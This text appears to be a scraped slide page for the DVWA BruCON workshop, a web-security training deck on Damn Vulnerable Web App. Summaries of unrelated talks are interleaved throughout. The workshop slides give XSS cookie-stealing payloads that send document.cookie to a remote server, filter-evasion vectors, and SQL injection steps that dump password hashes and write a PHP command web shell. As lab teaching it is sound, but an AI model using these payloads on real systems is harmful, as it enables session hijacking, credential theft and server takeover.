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DVWA BruCON Workshop

Ryan Dewhurst


Northumbria University

@ethicalhack3r            </head>

Damn Vulnerable Web App
The boring part. zzzz...

Ryan Dewhurst


Northumbria University

@ethicalhack3r                           </head>

Damn Vulnerable Web App
DVWA BruCON Workshop

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Welcome to the Reactive Revolution:RSocket and Spring Cloud Gateway - Spencer...
Welcome to the Reactive Revolution:RSocket and Spring Cloud Gateway - Spencer...Welcome to the Reactive Revolution:RSocket and Spring Cloud Gateway - Spencer...
Welcome to the Reactive Revolution:RSocket and Spring Cloud Gateway - Spencer...

Welcome to the Reactive Revolution:RSocket and Spring Cloud Gateway by Spencer Gibb at SpringOne Tour 2019

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Multi Tenancy With Python and Django
Multi Tenancy With Python and DjangoMulti Tenancy With Python and Django
Multi Tenancy With Python and Django

Multi-Tenancy is a critical component of any Software as a Service (SaaS) application, which enables one application instance to serve multiple organizations, or tenants. This presentation by Scott Crespo covers the basics of multi-tenant architectures, and how to implement multi-tenancy using Python, Django, and the open-source project known as Django Tenant Schemas.


About XSS security, their impact on PHP applications. Some examples of xss attacks. Solution for xss attacks.

xss solutionxsssecurity
What are we doing today?

Introduction to Web Application Security
Introduction to DVWA
Using DVWA
DVWA 2.0 codename ʻIveyʼ
Client   Application   Database
What is a Web Application?

Client           Application      Database
GET /index.html HTTP/1.1   1xx - Informational
Host:      2xx - Successful request
                           3xx - Redirection
                           4xx - Client error
                           5xx - Server error

                           GET - Retrieve resource
                           POST - Perform action
                           HEAD - Like GET
                           OPTIONS - Report methods
                           TRACE - Debugging
                           PUT - Upload resource

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Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained

Key Points What is Cross Site Request Forgery (CSRF)? How Attack Can Happen? Damages caused by CSRF? Mitigations What is Cross Site Request Forgery (CSRF)? CSRF is an attack in which attacker forges the request as a trusted user. The request is essentially made to send unintended data to the site. A vulnerable web application assumes that the data is coming from a trusted user. The root cause is – request coming from browser is trusted by server blindly, if CSRF protection is not implemented. This “blind trust” lets attacker create a forged request, and make the victim perform that request. How Attack Can Happen? Attacker knows about target application, on which the attack is to be performed Attacker forges request and sends it to victim who may be logged into the website by embedding that forged request into a hyperlink Victim clicks on it, and unknowingly sends malicious request to website Website accepts it and processes it. Thus the attacker is successful in performing the attack. Damages caused by CSRF? In Net-banking attacker can forge the request and send it to victim to steal money from Victim’s account Personal health information can be stolen or modified in a hospital database Attacker force victim to perform unwanted action which affect their profile Mitigation Techniques Can be mitigate by two ways CSRF token (a cookie which is introduced in each form and validated by web app) Captcha (implemented to ensure that the request is being performed by a human interaction)

ethical hackingwebsite hackinginformation security
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations

The document discusses security misconfiguration as the sixth most dangerous web application vulnerability according to the OWASP Top 10. It defines security misconfiguration as improper configuration settings that can enable attacks. The document outlines how attackers exploit default passwords and privileges, and provides examples of misconfigured systems. It recommends ways to prevent misconfiguration like changing defaults, deleting unnecessary accounts, and keeping systems updated. The document demonstrates how to detect hidden URLs and directory listings using Burp Suite and concludes that misconfiguration poses a high risk if not properly safeguarded against.

a6owaspowasp top 10
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject client-side scripts into web pages viewed by other users. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. XSS has been one of the top vulnerabilities on the OWASP Top Ten list for many years. While XSS attacks can compromise user sessions and steal sensitive data, developers can prevent XSS through proper input sanitization and output encoding. As web applications continue to grow in use, jobs in web application security and penetration testing are also expected to increase significantly in the coming years.

Hypertext Transfer Protocol (HTTP)

GET /index.html HTTP/1.1              1xx - Informational
Host:                 2xx - Successful request
                                      3xx - Redirection
                                      4xx - Client error
HTTP/1.1 200 OK                       5xx - Server error
Date: Fri, 10 Sep 2010 17:59:00 GMT
Server: Apache
                                      GET - Retrieve resource
<html>                                POST - Perform action
<head></head>                         HEAD - Like GET
<body>                                OPTIONS - Report methods
<h1>It worked!</h1>                   TRACE - Debugging
</body>                               PUT - Upload resource
The average website had nearly 13 serious vulnerabilities.
Web Application (In)security

The average website had nearly 13 serious vulnerabilities.
Client         Firewall   Web Server


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Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing

Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting

Cross Site Scripting (XSS) is a type of injection attack where malicious scripts are injected into otherwise benign and trusted websites. XSS has been a top web application vulnerability since 1996. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts come from URLs, while stored XSS happens when scripts are stored on websites. XSS can be used to steal cookies and sessions, redirect users, alter website contents, and damage an organization's reputation. Developers can prevent XSS through input validation, output encoding, and using the HttpOnly flag.

Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)

Cross-site scripting (XSS) allows malicious code to be injected into web applications, potentially enabling attacks like cookie theft, account hijacking, and phishing. There are three main types of XSS attacks: reflected, stored, and DOM-based. Reflected XSS tricks the user into clicking a malicious link, while stored XSS embeds malicious code directly into the website. DOM-based XSS targets vulnerabilities in client-side scripts. XSS remains a significant threat and proper input validation and output encoding are needed to help prevent attacks.

Web Application (In)security

Client         Firewall      Web Server

DVWA BruCON Workshop
Web Application (In)security

Information Gathering - Spider, Search Engines, Application Discovery

Configuration Management - HTTP Methods, Admin Interfaces, Forgotten Files

Business Logic - Bypassable Business Logic

Authentication - Use of Encryption, Brute Force, Bypass, CAPTCHA

Authorisation - Path Traversal, Privilege Escalation

Session Management - Cookies, Session Management, Session Fixation

Data Validation - XSS, SQLi, OS Commanding, HTTP Splitting, XML Injection

Denial of Service - SQL Wildcard, Locking Accounts, Storing too much data

Web Service - Testing WSDL, REST, SOAP
DVWA BruCON Workshop

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02 api gateway
02 api gateway02 api gateway
02 api gateway

This document discusses API gateways as a solution for challenges that arise in microservices architectures. It describes how a monolithic architecture can become complex as services grow quickly. In a microservices architecture, clients could communicate directly with each service but this introduces problems around endpoint management, multiple requests, and refactoring difficulties. An API gateway provides a single entry point, routes requests to appropriate services, and aggregates results to address these issues. It then demonstrates Netflix Zuul, an open source API gateway, and provides a demo of its use with Eureka service discovery and routing between hello and goodbye microservices.

A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration

Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.

Web application security & Testing
Web application security  & TestingWeb application security  & Testing
Web application security & Testing

This document summarizes web application security testing. It discusses understanding how web applications work and common security risks. It then outlines the main steps of a security test: information gathering, configuration management testing, authentication testing, authorization testing, business logic testing, data validation testing, and denial of service testing. Specific techniques are provided for each step like using tools like Nikto, ZAP, and Hydra or manually testing authentication, injections, error handling, and more.

testing automationweb securityweb testing
DVWA BruCON Workshop
Header Information Leakage

  $nc 80
  GET /login.php HTTP/1.0
DVWA BruCON Workshop
Header Information Leakage

HTTP/1.1 200 OK
Date: {todays date/time}
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.81 PHP/5.3.1 mod_apreq2-20090110/2.7.1
mod_perl/2.0.4 Perl/v.5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID={your session id} path=/
Set Cookie: security=high


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XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5

This document discusses cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks in HTML5. It begins with an overview of the evolution of HTML and the expansion of the browser attack surface with new technologies. It then covers specific XSS vectors using new HTML5 features like media tags, autofocus attributes, and forms. The document also examines how CSRF can be conducted using HTML5 features like XMLHttpRequests and bypassing the same-origin policy and CORS restrictions. Defense techniques like content security policy headers are also discussed.

Online quiz by danish & sudhanshu techlites
Online quiz by danish & sudhanshu techlitesOnline quiz by danish & sudhanshu techlites
Online quiz by danish & sudhanshu techlites

I made this ppt for giving presentation in our college on online quiz system, this includes introduction, need, requirement analysis, screenshots etc.

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Introduction to OpenID Connect
Introduction to OpenID Connect Introduction to OpenID Connect
Introduction to OpenID Connect

This document summarizes a presentation about OpenID Connect. OpenID Connect is an identity layer on top of the OAuth 2.0 protocol that allows clients to verify the identity of the user based on the authentication performed by an authorization server, as well as to obtain basic profile information about the user. It defines core functionality for modern identity frameworks by standardizing how clients and servers discover and use identity data exposed by identity providers and how clients can verify that identity data. The presenter discusses how OpenID Connect provides a simple yet powerful way to authenticate users and share attributes about them between websites and applications in an interoperable manner.

oauthopenid connectopenid
Server                                  X-Powered-By
$sudo nano /opt/lampp/etc/httpd.conf
- ServerTokens Prod

                          $sudo /opt/lampp/lampp restart
Header Information Leakage

             Server                                  X-Powered-By
$sudo nano /opt/lampp/etc/httpd.conf         $sudo nano /opt/lampp/etc/php.ini -c
- ServerTokens Prod                          - 433:expose_php = Off

                          $sudo /opt/lampp/lampp restart
Cross Site Scripting (XSS)

 Even the biggest and baddest get it wrong:

              Google (biggest)
             Facebook (baddest)

         The list goes on and on...

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Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suite

This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack paylists, and test authentication through bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.

Getting started with Spring Security
Getting started with Spring SecurityGetting started with Spring Security
Getting started with Spring Security

In this session we will discuss about spring security, how it works, authentication and authorization in spring boot application.

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SQL Enjeksiyona karşi savunma
SQL Enjeksiyona karşi savunmaSQL Enjeksiyona karşi savunma
SQL Enjeksiyona karşi savunma
sql injectionprotection
DVWA BruCON Workshop
Cross Site Scripting (XSS)



Cross Site Scripting (XSS)

                                         Remote scripts
                       <script src=></script>

                                         Cookie stealing
<script>document.location="" + document.cookie</script>

                                         Grab NATed IP

                                   JavaScript port scanner

                 <script>document.body.innerHTML=”Rick Astley”</script>


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Sqlmap Analiz
Sqlmap AnalizSqlmap Analiz
Sqlmap Analiz

Sqlmap Bypass 'larının nasıl çalıştıgı anlatılmıştır.Sorusu olan email adresinden ulaşabilir.

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Web For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine GirişWeb For Pentester ile Web Uygulama Güvenliğine Giriş
Web For Pentester ile Web Uygulama Güvenliğine Giriş

Web For Pentester örnek çözümleri.

web application securitypenetration testinginformation security
DVWA BruCON Workshop
Cross Site Scripting (XSS)

      # # www.w.ww/@"style="position:absolute;margin-top:-900px;margin-left:-900px;width:
                9999em;height:9999em"onmouseover=alert(document.cookie)//"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status-

DVWA BruCON Workshop
Cross Site Scripting (XSS)

Filter user supplied input/output. White list!

IE, Opera, Firefox (with NoScript plugin)

Web Application Firewall (WAF)

Web Development Framework

HTTPOnly flag, restrict domain+path scope

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Web for Pentester 2 ile Web Uygulama Güvenligine Giris
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Web for Pentester 2 ile Web Uygulama Güvenligine Giris

Web for Pentester 2 ile Web Uygulama Güvenliğine Giriş

Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)

This document discusses Memcache injection, which is a technique for injecting malicious code into Memcached servers. It demonstrates how to inject newline characters to overwrite cached values and execute arbitrary commands. It also lists some programming languages and libraries that are vulnerable, as well as content management systems that could be impacted. Safe libraries and updated systems that have addressed this issue are also mentioned. The document aims to raise awareness of this Memcached injection technique and provide information to help secure systems.

security memcache
Shodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San FranciscoShodan Search Engine: Amphion Forum San Francisco
Shodan Search Engine: Amphion Forum San Francisco

Shawn Merdinger gave a presentation on Shodan, a search engine for internet-connected devices. He explained that Shodan scans the internet and indexes banners from devices to make them searchable. This allows users to find unprotected devices like IP cameras, industrial control systems, and medical devices. Merdinger showed examples of sensitive devices he discovered, including traffic lights, TV station antennas, and gas station pumps. He emphasized that while concerning, the visibility provided by Shodan can encourage better security practices.

DVWA BruCON Workshop
Cross Site Scripting (XSS)


                               <scr<script>ipt>alert(1)</scr</script> ipt>

                                       <img src=”” onerror=”alert(1)”>


String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 41, 60, 47, 115, 99,
                                         114, 105, 112, 116, 62)
DVWA BruCON Workshop
Creating a vulnerable site

                 Log in
Go to the DVWA Security menu on the left
     Change the security level to low
            Disable NoScript

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Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)

This document outlines a presentation on hacking given by Ömer Çıtak at DEU's 2016 Computer Science Days. The presentation introduces the ADDIE model for designing training and discusses examples of hacking humans, drones, websites, governments, and universities to achieve various targets or results. It concludes by thanking the audience and providing Ömer Çıtak's website and social media information.

Bilgi Sistemleri Güvenliği Metasploit
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Bilgi Sistemleri Güvenliği Metasploit Sunumu

Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)

Akademik Bilişim 2016 etkinliği kapsamında Aydın Adnan Menderes Üniversitesi'nde vermiş olduğum seminerin sunumu.

DVWA BruCON Workshop
Checking for HTML Injection

We are going to look for reflected XSS, start simple

Go to the XSS reflected page and enter the following

DVWA BruCON Workshop
Checking for Script Injection

Now we know we can inject HTML lets go for the
          classic XSS attack. Enter


        This is where most people stop

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Bu döküman Linux nedir neden tercih edilir gibi sorulara cevap arayanlara kısa bir bilgilendirmeden sonra Sanal makinaya Linux Ubuntu dağıtımının kurulumunu göstererek genel linux terminal ve komutlarının anlatımıyla son bulmaktadır.Lİnux ve özgür yazılım farkındalığını artırmak için giriş seviyesinde bir dökumandır.İşinize yaraması dileğiyle iyi çalışmalar.Soru,görüş ve önerileriniz için a mail atabilirsiniz.

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DVWA BruCON Workshop
Lets see if we can see the cookie

 See if we can see the session cookie


This is OUR cookie, not much use, yet
DVWA BruCON Workshop
Requesting images

This is where you have to use your imagination. Lets
       request an “image” from a remote server

<img src="http://localhost/cookie_steal_image.html" >

 Normally you would use an IP from a machine you
control and not localhost but localhost will have to do
   for now as we donʼt have network connections

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Web Uygulama Güven(siz)liği
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Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
DVWA BruCON Workshop
Lets check the logs

Bring up a terminal and tail the Apache web logs

        tail -f /opt/lampp/log/access.log

 Look for the entry for cookie_steal_image.html
DVWA BruCON Workshop
Whats happening?

  We have just requested an image from a server we

   If we can get a victim to trigger that XSS we will be
informed when they hit it if we are watching our apache

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Bilgi Güvenliği Akademisi Ekibi Tarafından Hazırlanmış Dokümandır. Bu Sunum Fireeye APT Etkinliği için Hazırlanmıştır.

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Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
DVWA BruCON Workshop
Tying the two together

        We can make a request to our server

              We can access the cookie

Can we tie the two together and send the cookie to our

DVWA BruCON Workshop
What we canʼt do

                    We canʼt do this

 <img src=”http://localhost/steal_cookie_image.html?

Because this would request the literal string specified in
                     the quotes

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Adli Bilişim Açısından E-posta Sistemi
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Adli Bilişim Açısından E-posta Sistemi
e-postadli bilişimforensics
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications

The top 10 security issues in web applications are: 1. Injection flaws such as SQL, OS, and LDAP injection. 2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser. 3. Broken authentication and session management, such as not logging users out properly or exposing session IDs. 4. Insecure direct object references where users can directly access files without authorization checks. 5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend. 6. Security misconfiguration of web or application servers. 7. Insecure cryptographic storage of passwords or sensitive data. 8

web security devnology osap
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)

How a new HTTP response header can help increase the depth of your web application defenses. Also includes a few slides on HTTP Strict Transport Security, a header which helps protects HTTPS sites from sslstrip attacks.

cspowaspcross-site scripting
DVWA BruCON Workshop
Dynamically requesting images

 So we have to dynamically create the image request

  <script>document.write('<img src="http://localhost/

This will do the same as the original image request but
             it is created through JavaScript
DVWA BruCON Workshop
Dynamically requesting images

        And JavaScript can access the cookie

  <script>document.write('<img src="http://localhost/
cookie_steal_image.html?' + escape(document.cookie)
                   + '>');</script>

 The escape is needed to HTML encode the cookie.
 This stops “bad” characters from breaking the image

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W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities

Slides for "HTML5 Security Realities" talk at W3Conf: Practical Standards for Web Professionals 2013. Brad Hill - PayPal @hillbrad

html5 security csp mashups
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security

This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process

This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.

DVWA BruCON Workshop
Now check your logs again


    /cookie_steal_image.html? security=low;
DVWA BruCON Workshop
Setting the cookie

   You can now use Add ʻnʼ Edit cookies or Web
Developer Toolbar or all sorts of other tools to set that
             cookie into your browser

  Unfortunately DVWA Live CD doesnʼt have these

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Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals

The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.

Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...

The document discusses techniques for fingerprinting web servers by analyzing differences in their responses to common HTTP requests. It then outlines how this information can be used to identify specific web server software and versions. The document also examines how web server fingerprinting could enable cross-site tracing attacks if certain HTTP request methods like TRACE are enabled.

jeremiah grossman whitehat security black hat 2002
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default

The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities. One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest (=attack) painful, or just rendered the scenarios irrelevant.

application security j2ee
DVWA BruCON Workshop
How do we get the URL to the user?
So, we have generated this great attack, how do we get
                   it to the user?

  Check the querystring, it should look something like


      You can think of ways to send this to victim
DVWA BruCON Workshop
SQL Injection

$query = “SELECT * FROM users WHERE
username=ʻ$userʼ AND password=ʻ$passʼ ”;

$query = “SELECT * FROM users WHERE
username=ʻryanʼ AND password=ʻ123456ʼ ”;

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Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default

The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities. One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest (=attack) painful, or just rendered the scenarios irrelevant.

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[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design[convergese] Adaptive Images in Responsive Web Design
[convergese] Adaptive Images in Responsive Web Design

This document discusses responsive image techniques for adaptive web design. It begins by explaining browser sniffing versus feature testing, and recommends using feature testing to determine browser width, screen resolution, and bandwidth instead of browser sniffing. It then covers techniques like using background-size to control image sizes, SVG for smaller file sizes, and font-based solutions. The document also discusses server-side techniques like .htaccess rewrite rules and client-side techniques like picture and HiSRC. It advocates for a mobile-first approach using CSS media queries and a single pixel GIF for responsive images.

csshtml5responsive web design
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation

This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.

DVWA BruCON Workshop
SQL Injection

  $query = “SELECT * FROM users WHERE
   username=ʻʼʼ AND password=ʻ123456ʼ ”;

   $query = “SELECT * FROM users WHERE
username=ʻadminʼ -- ʼ AND password=ʻ123456ʼ ”;
DVWA BruCON Workshop
SQL Injection

SELECT first_name, last_name FROM users WHERE

              ID: 1
              First name: admin
              Surname: admin

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[refreshaustin] Adaptive Images in Responsive Web Design
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[refreshaustin] Adaptive Images in Responsive Web Design

This document discusses various techniques for responsive images in web design, including browser sniffing versus feature testing, image sizes for different screen resolutions and bandwidths, and different implementation methods like .htaccess files, the <picture> element, and JavaScript libraries. It covers topics like using the browser width to determine layouts, screen resolution detection, and bandwidth testing. Workarounds discussed include using background images, SVGs, icon fonts, and compressed JPEGs. The document advocates a mobile-first approach and using CSS media queries to adapt designs based on screen size.

[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...

This document summarizes techniques for detecting XXE and SSRF vulnerabilities using DNS records. It describes how an attacker can configure their own DNS server to return their IP address instead of the actual domain, allowing them to detect if the application makes external requests. It also discusses challenges of detecting these vulnerabilities, and provides examples of how to test for them including checking web server access logs for requests to domains controlled by the attacker. The document then covers additional techniques like bypassing content security policies, detecting real users behind Cloudflare, and exploiting URL encoding to bypass input filtering.

web securityowasprussia
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP

This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.

DVWA BruCON Workshop
SQL Injection

SELECT first_name, last_name FROM users WHERE

  You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version
     for the right syntax to use near ʻʼ” at line 1
DVWA BruCON Workshop
SQL Injection

SELECT first_name, last_name FROM users WHERE
             user_id=ʻ1ʼ OR 1=1 #ʼ

                  ID: 1ʼ OR 1=1#
                  First name: admin
                  Surname: admin

                  ID: 1ʼ OR 1=1#
                  First name: Gordon
                  Surname: Brown

                  ID: 1ʼ OR 1=1#
                  First name: Hack
                  Surname: Me

                  ID: 1ʼ OR 1=1#
                  First name: Pablo
                  Surname: Picasso

                  ID: 1ʼ OR 1=1#
                  First name: bob
                  Surname: smith

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Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with Perl

This document discusses techniques for building scalable websites with Perl, including: 1) Caching at various levels (page, partial page, and database caching) to improve performance and reduce load on application servers. 2) Using job queuing and worker processes to distribute processing-intensive tasks asynchronously instead of blocking web requests. 3) Leveraging caching and queueing libraries like Cache::FastMmap, Memcached, and Spread::Queue to implement caching and job queueing in Perl applications.

[rwdsummit] Adaptive Images in Responsive Web Design
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[rwdsummit] Adaptive Images in Responsive Web Design

The document summarizes Christopher Schmitt's presentation at RWD Summit 2014 on adaptive images in responsive web design. It discusses using feature testing over browser sniffing to determine screen resolution and bandwidth. It presents techniques like srcset, picture, and JavaScript solutions to serve appropriately sized images. It also covers workarounds like background-size, SVG, and font-based solutions when native techniques are not supported. The focus is on building responsive images that scale with the device and load quickly.

htmladaptive imageshtml5
Hacking Client Side Insecurities
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Hacking Client Side Insecurities

The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.

DVWA BruCON Workshop
SQL Injection
               Find number of columns

SELECT first_name, last_name FROM users WHERE
           user_id=ʻ1ʼ ORDER BY 1 #ʼ
DVWA BruCON Workshop
SQL Injection
                   Find field names

SELECT first_name, last_name FROM users WHERE
     user_id=ʻaʼ OR username = ʻadminʼ -- ʼ

   Unknown column ʻusernameʼ in ʻwhere clauseʼ

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[cssdevconf] Adaptive Images in Responsive Web Design
[cssdevconf] Adaptive Images in Responsive Web Design[cssdevconf] Adaptive Images in Responsive Web Design
[cssdevconf] Adaptive Images in Responsive Web Design

This document summarizes Christopher Schmitt's presentation on adaptive images in responsive web design. The presentation covered: 1. Using the browser width, screen resolution, and bandwidth to determine the appropriate image to serve through feature testing rather than browser sniffing. 2. Techniques for serving responsive images including using .htaccess files, the <picture> element, and JavaScript libraries like HiSRC that select images based on various tests. 3. Workarounds for older browsers including using background-size: 100%, SVG images, and font-based solutions.

Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10

Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed. This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities. It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.

csrfsecure codingsecure chandigarh
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

The document discusses security vulnerabilities found in the web interfaces of security gateways. The author details how they used automated scanners, manual testing with Burp, and SSH access to root to find over 35 exploits in various security gateway products since 2011. Common vulnerabilities included input validation issues, predictable URLs and parameters enabling CSRF, excessive privileges, and session management flaws. The author provides examples of compromising ClearOS and Websense gateways, and demonstrates OSRF through Proofpoint's email system. They conclude many techniques are older but there remains a knowledge gap between secure web and UI development.

DVWA BruCON Workshop
SQL Injection
                   Find database name

SELECT first_name, last_name FROM users WHERE
  user_id=ʻaʼ UNION SELECT null,database() # ʼ

ID: aʼ UNION SELECT null,database() #
First name:
Surname: dvwa
DVWA BruCON Workshop
SQL Injection
                                        Find table name

 SELECT first_name, last_name FROM users WHERE
      user_id=ʻaʼ UNION SELECT table_schema,
table_name FROM information_schema.tables WHERE
               table_schema = ʻdvwaʼ #ʼ

ID: aʼ UNION SELECT table_schema...
First name: dvwa
Surname: guestbook

ID: aʼ UNION SELECT table_schema...
First name: dvwa
Surname: users

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DVWA BruCON Workshop
SQL Injection
                                     Extract passwords

 SELECT first_name, last_name FROM users WHERE
  user_id=ʻaʼ UNION SELECT user,password FROM
                     users #ʼ

ID: aʼ UNION SELECT user,password FROM users #
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: aʼ UNION SELECT user,password FROM users #
First name: gordonb
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
DVWA BruCON Workshop
SQL Injection
                            Create PHP backdoor

SELECT first_name, last_name FROM users WHERE
      user_id=ʻaʼ UNION SELECT null,ʼ<?php
 system($_GET[ʻcmdʼ]); ?>ʼ INTO OUTFILE ʻ/opt/
